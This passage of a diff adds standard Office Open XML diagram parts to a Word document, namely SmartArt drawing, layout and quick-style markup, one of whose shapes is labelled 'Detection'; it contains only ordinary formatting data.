+            <a:t>Detection</a:t>
+          </a:r>
+        </a:p>
+      </dsp:txBody>
+      <dsp:txXfrm>
+        <a:off x="4403169" y="2001362"/>
+        <a:ext cx="840481" cy="818762"/>
+      </dsp:txXfrm>
+    </dsp:sp>
+  </dsp:spTree>
+</dsp:drawing>
+</file>
+
+<file path=word/diagrams/layout1.xml><?xml version="1.0" encoding="utf-8"?>
+<dgm:layoutDef xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uniqueId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2">
+  <dgm:title val=""/>
+  <dgm:desc val=""/>
+  <dgm:catLst>
+    <dgm:cat type="process" pri="24000"/>
+  </dgm:catLst>
+  <dgm:sampData>
+    <dgm:dataModel>
+      <dgm:ptLst>
+        <dgm:pt modelId="0" type="doc"/>
+        <dgm:pt modelId="1">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+        <dgm:pt modelId="2">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+        <dgm:pt modelId="3">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+        <dgm:pt modelId="4">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+        <dgm:pt modelId="5">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+        <dgm:pt modelId="6">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+        <dgm:pt modelId="7">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+        <dgm:pt modelId="8">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+        <dgm:pt modelId="9">
+          <dgm:prSet phldr="1"/>
+        </dgm:pt>
+      </dgm:ptLst>
+      <dgm:cxnLst>
+        <dgm:cxn modelId="10" srcId="0" destId="1" srcOrd="0" destOrd="0"/>
+        <dgm:cxn modelId="11" srcId="0" destId="2" srcOrd="1" destOrd="0"/>
+        <dgm:cxn modelId="12" srcId="0" destId="3" srcOrd="2" destOrd="0"/>
+        <dgm:cxn modelId="13" srcId="0" destId="4" srcOrd="3" destOrd="0"/>
+        <dgm:cxn modelId="14" srcId="0" destId="5" srcOrd="4" destOrd="0"/>
+        <dgm:cxn modelId="15" srcId="0" destId="6" srcOrd="5" destOrd="0"/>
+        <dgm:cxn modelId="16" srcId="0" destId="7" srcOrd="6" destOrd="0"/>
+        <dgm:cxn modelId="17" srcId="0" destId="8" srcOrd="7" destOrd="0"/>
+        <dgm:cxn modelId="18" srcId="0" destId="9" srcOrd="8" destOrd="0"/>
+      </dgm:cxnLst>
+      <dgm:bg/>
+      <dgm:whole/>
+    </dgm:dataModel>
+  </dgm:sampData>
+  <dgm:styleData>
+    <dgm:dataModel>
+      <dgm:ptLst>
+        <dgm:pt modelId="0" type="doc"/>
+        <dgm:pt modelId="1"/>
+        <dgm:pt modelId="2"/>
+      </dgm:ptLst>
+      <dgm:cxnLst>
+        <dgm:cxn modelId="3" srcId="0" destId="1" srcOrd="0" destOrd="0"/>
+        <dgm:cxn modelId="4" srcId="0" destId="2" srcOrd="1" destOrd="0"/>
+      </dgm:cxnLst>
+      <dgm:bg/>
+      <dgm:whole/>
+    </dgm:dataModel>
+  </dgm:styleData>
+  <dgm:clrData>
+    <dgm:dataModel>
+      <dgm:ptLst>
+        <dgm:pt modelId="0" type="doc"/>
+        <dgm:pt modelId="1"/>
+        <dgm:pt modelId="2"/>
+        <dgm:pt modelId="3"/>
+        <dgm:pt modelId="4"/>
+        <dgm:pt modelId="5"/>
+        <dgm:pt modelId="6"/>
+      </dgm:ptLst>
+      <dgm:cxnLst>
+        <dgm:cxn modelId="7" srcId="0" destId="1" srcOrd="0" destOrd="0"/>
+        <dgm:cxn modelId="8" srcId="0" destId="2" srcOrd="1" destOrd="0"/>
+        <dgm:cxn modelId="9" srcId="0" destId="3" srcOrd="2" destOrd="0"/>
+        <dgm:cxn modelId="10" srcId="0" destId="4" srcOrd="3" destOrd="0"/>
+        <dgm:cxn modelId="11" srcId="0" destId="5" srcOrd="4" destOrd="0"/>
+        <dgm:cxn modelId="12" srcId="0" destId="6" srcOrd="5" destOrd="0"/>
+      </dgm:cxnLst>
+      <dgm:bg/>
+      <dgm:whole/>
+    </dgm:dataModel>
+  </dgm:clrData>
+  <dgm:layoutNode name="diagram">
+    <dgm:varLst>
+      <dgm:dir/>
+      <dgm:resizeHandles/>
+    </dgm:varLst>
+    <dgm:choose name="Name0">
+      <dgm:if name="Name1" func="var" arg="dir" op="equ" val="norm">
+        <dgm:alg type="snake">
+          <dgm:param type="grDir" val="tL"/>
+          <dgm:param type="flowDir" val="col"/>
+          <dgm:param type="contDir" val="revDir"/>
+        </dgm:alg>
+      </dgm:if>
+      <dgm:else name="Name2">
+        <dgm:alg type="snake">
+          <dgm:param type="grDir" val="tR"/>
+          <dgm:param type="flowDir" val="col"/>
+          <dgm:param type="contDir" val="revDir"/>
+        </dgm:alg>
+      </dgm:else>
+    </dgm:choose>
+    <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:blip="">
+      <dgm:adjLst/>
+    </dgm:shape>
+    <dgm:presOf/>
+    <dgm:constrLst>
+      <dgm:constr type="w" for="ch" forName="firstNode" refType="w"/>
+      <dgm:constr type="w" for="ch" forName="lastNode" refType="w" refFor="ch" refForName="firstNode" op="equ"/>
+      <dgm:constr type="w" for="ch" forName="middleNode" refType="w" refFor="ch" refForName="firstNode" op="equ"/>
+      <dgm:constr type="h" for="ch" ptType="sibTrans" refType="w" refFor="ch" refForName="middleNode" op="equ" fact="0.35"/>
+      <dgm:constr type="sp" refType="w" refFor="ch" refForName="middleNode" fact="0.5"/>
+      <dgm:constr type="connDist" for="des" ptType="sibTrans" op="equ"/>
+      <dgm:constr type="primFontSz" for="ch" forName="firstNode" val="65"/>
+      <dgm:constr type="primFontSz" for="ch" forName="lastNode" refType="primFontSz" refFor="ch" refForName="firstNode" op="equ"/>
+      <dgm:constr type="primFontSz" for="des" forName="shape" val="65"/>
+      <dgm:constr type="primFontSz" for="des" forName="shape" refType="primFontSz" refFor="ch" refForName="firstNode" op="lte"/>
+      <dgm:constr type="primFontSz" for="des" forName="shape" refType="primFontSz" refFor="ch" refForName="lastNode" op="lte"/>
+    </dgm:constrLst>
+    <dgm:ruleLst/>
+    <dgm:forEach name="Name3" axis="ch" ptType="node">
+      <dgm:choose name="Name4">
+        <dgm:if name="Name5" axis="self" ptType="node" func="pos" op="equ" val="1">
+          <dgm:layoutNode name="firstNode">
+            <dgm:varLst>
+              <dgm:bulletEnabled val="1"/>
+            </dgm:varLst>
+            <dgm:alg type="tx">
+              <dgm:param type="txAnchorVertCh" val="mid"/>
+            </dgm:alg>
+            <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="ellipse" r:blip="">
+              <dgm:adjLst/>
+            </dgm:shape>
+            <dgm:presOf axis="desOrSelf" ptType="node"/>
+            <dgm:constrLst>
+              <dgm:constr type="h" refType="w"/>
+              <dgm:constr type="tMarg" refType="primFontSz" fact="0.1"/>
+              <dgm:constr type="bMarg" refType="primFontSz" fact="0.1"/>
+              <dgm:constr type="lMarg" refType="primFontSz" fact="0.1"/>
+              <dgm:constr type="rMarg" refType="primFontSz" fact="0.1"/>
+            </dgm:constrLst>
+            <dgm:ruleLst>
+              <dgm:rule type="primFontSz" val="5" fact="NaN" max="NaN"/>
+            </dgm:ruleLst>
+          </dgm:layoutNode>
+        </dgm:if>
+        <dgm:if name="Name6" axis="self" ptType="node" func="revPos" op="equ" val="1">
+          <dgm:layoutNode name="lastNode">
+            <dgm:varLst>
+              <dgm:bulletEnabled val="1"/>
+            </dgm:varLst>
+            <dgm:alg type="tx">
+              <dgm:param type="txAnchorVertCh" val="mid"/>
+            </dgm:alg>
+            <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="ellipse" r:blip="">
+              <dgm:adjLst/>
+            </dgm:shape>
+            <dgm:presOf axis="desOrSelf" ptType="node"/>
+            <dgm:constrLst>
+              <dgm:constr type="h" refType="w"/>
+              <dgm:constr type="tMarg" refType="primFontSz" fact="0.1"/>
+              <dgm:constr type="bMarg" refType="primFontSz" fact="0.1"/>
+              <dgm:constr type="lMarg" refType="primFontSz" fact="0.1"/>
+              <dgm:constr type="rMarg" refType="primFontSz" fact="0.1"/>
+            </dgm:constrLst>
+            <dgm:ruleLst>
+              <dgm:rule type="primFontSz" val="5" fact="NaN" max="NaN"/>
+            </dgm:ruleLst>
+          </dgm:layoutNode>
+        </dgm:if>
+        <dgm:else name="Name7">
+          <dgm:layoutNode name="middleNode">
+            <dgm:alg type="composite"/>
+            <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:blip="">
+              <dgm:adjLst/>
+            </dgm:shape>
+            <dgm:presOf/>
+            <dgm:constrLst>
+              <dgm:constr type="h" refType="w"/>
+              <dgm:constr type="w" for="ch" forName="padding" refType="w"/>
+              <dgm:constr type="h" for="ch" forName="padding" refType="h"/>
+              <dgm:constr type="w" for="ch" forName="shape" refType="w" fact="0.667"/>
+              <dgm:constr type="h" for="ch" forName="shape" refType="h" fact="0.667"/>
+              <dgm:constr type="ctrX" for="ch" forName="shape" refType="w" fact="0.5"/>
+              <dgm:constr type="ctrY" for="ch" forName="shape" refType="h" fact="0.5"/>
+            </dgm:constrLst>
+            <dgm:ruleLst/>
+            <dgm:layoutNode name="padding">
+              <dgm:alg type="sp"/>
+              <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="ellipse" r:blip="" hideGeom="1">
+                <dgm:adjLst/>
+              </dgm:shape>
+              <dgm:presOf/>
+              <dgm:constrLst/>
+              <dgm:ruleLst/>
+            </dgm:layoutNode>
+            <dgm:layoutNode name="shape">
+              <dgm:varLst>
+                <dgm:bulletEnabled val="1"/>
+              </dgm:varLst>
+              <dgm:alg type="tx">
+                <dgm:param type="txAnchorVertCh" val="mid"/>
+              </dgm:alg>
+              <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" type="ellipse" r:blip="">
+                <dgm:adjLst/>
+              </dgm:shape>
+              <dgm:presOf axis="desOrSelf" ptType="node"/>
+              <dgm:constrLst>
+                <dgm:constr type="h" refType="w"/>
+                <dgm:constr type="tMarg" refType="primFontSz" fact="0.1"/>
+                <dgm:constr type="bMarg" refType="primFontSz" fact="0.1"/>
+                <dgm:constr type="lMarg" refType="primFontSz" fact="0.1"/>
+                <dgm:constr type="rMarg" refType="primFontSz" fact="0.1"/>
+              </dgm:constrLst>
+              <dgm:ruleLst>
+                <dgm:rule type="primFontSz" val="5" fact="NaN" max="NaN"/>
+              </dgm:ruleLst>
+            </dgm:layoutNode>
+          </dgm:layoutNode>
+        </dgm:else>
+      </dgm:choose>
+      <dgm:forEach name="Name8" axis="followSib" ptType="sibTrans" cnt="1">
+        <dgm:layoutNode name="sibTrans">
+          <dgm:choose name="Name9">
+            <dgm:if name="Name10" func="var" arg="dir" op="equ" val="norm">
+              <dgm:choose name="Name11">
+                <dgm:if name="Name12" axis="self" ptType="sibTrans" func="pos" op="equ" val="1">
+                  <dgm:alg type="conn">
+                    <dgm:param type="begPts" val="auto"/>
+                    <dgm:param type="endPts" val="auto"/>
+                    <dgm:param type="srcNode" val="firstNode"/>
+                    <dgm:param type="dstNode" val="shape"/>
+                  </dgm:alg>
+                </dgm:if>
+                <dgm:if name="Name13" axis="self" ptType="sibTrans" func="revPos" op="equ" val="1">
+                  <dgm:alg type="conn">
+                    <dgm:param type="begPts" val="auto"/>
+                    <dgm:param type="endPts" val="auto"/>
+                    <dgm:param type="srcNode" val="shape"/>
+                    <dgm:param type="dstNode" val="lastNode"/>
+                  </dgm:alg>
+                </dgm:if>
+                <dgm:else name="Name14">
+                  <dgm:alg type="conn">
+                    <dgm:param type="begPts" val="auto"/>
+                    <dgm:param type="endPts" val="auto"/>
+                    <dgm:param type="srcNode" val="shape"/>
+                    <dgm:param type="dstNode" val="shape"/>
+                  </dgm:alg>
+                </dgm:else>
+              </dgm:choose>
+            </dgm:if>
+            <dgm:else name="Name15">
+              <dgm:choose name="Name16">
+                <dgm:if name="Name17" axis="self" ptType="sibTrans" func="pos" op="equ" val="1">
+                  <dgm:alg type="conn">
+                    <dgm:param type="begPts" val="auto"/>
+                    <dgm:param type="endPts" val="auto"/>
+                    <dgm:param type="srcNode" val="firstNode"/>
+                    <dgm:param type="dstNode" val="shape"/>
+                  </dgm:alg>
+                </dgm:if>
+                <dgm:if name="Name18" axis="self" ptType="sibTrans" func="revPos" op="equ" val="1">
+                  <dgm:alg type="conn">
+                    <dgm:param type="begPts" val="auto"/>
+                    <dgm:param type="endPts" val="auto"/>
+                    <dgm:param type="srcNode" val="shape"/>
+                    <dgm:param type="dstNode" val="lastNode"/>
+                  </dgm:alg>
+                </dgm:if>
+                <dgm:else name="Name19">
+                  <dgm:alg type="conn">
+                    <dgm:param type="begPts" val="auto"/>
+                    <dgm:param type="endPts" val="auto"/>
+                    <dgm:param type="srcNode" val="shape"/>
+                    <dgm:param type="dstNode" val="shape"/>
+                  </dgm:alg>
+                </dgm:else>
+              </dgm:choose>
+            </dgm:else>
+          </dgm:choose>
+          <dgm:shape xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" rot="90" type="triangle" r:blip="">
+            <dgm:adjLst/>
+          </dgm:shape>
+          <dgm:presOf axis="self"/>
+          <dgm:constrLst>
+            <dgm:constr type="w" refType="h"/>
+            <dgm:constr type="connDist"/>
+            <dgm:constr type="begPad" refType="connDist" fact="0.25"/>
+            <dgm:constr type="endPad" refType="connDist" fact="0.22"/>
+          </dgm:constrLst>
+          <dgm:ruleLst/>
+        </dgm:layoutNode>
+      </dgm:forEach>
+    </dgm:forEach>
+  </dgm:layoutNode>
+</dgm:layoutDef>
+</file>
+
+<file path=word/diagrams/quickStyle1.xml><?xml version="1.0" encoding="utf-8"?>
+<dgm:styleDef xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uniqueId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1">
+  <dgm:title val=""/>
+  <dgm:desc val=""/>
+  <dgm:catLst>
+    <dgm:cat type="simple" pri="10100"/>
+  </dgm:catLst>
+  <dgm:scene3d>
+    <a:camera prst="orthographicFront"/>
+    <a:lightRig rig="threePt" dir="t"/>
+  </dgm:scene3d>
+  <dgm:styleLbl name="node0">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="lnNode1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="vennNode1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="tx1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="alignNode1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="node1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="node2">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="node3">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="node4">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgImgPlace1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="alignImgPlace1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgImgPlace1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="sibTrans2D1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgSibTrans2D1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgSibTrans2D1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="sibTrans1D1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="callout">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst0">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst2">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst3">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="asst4">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans2D1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans2D2">
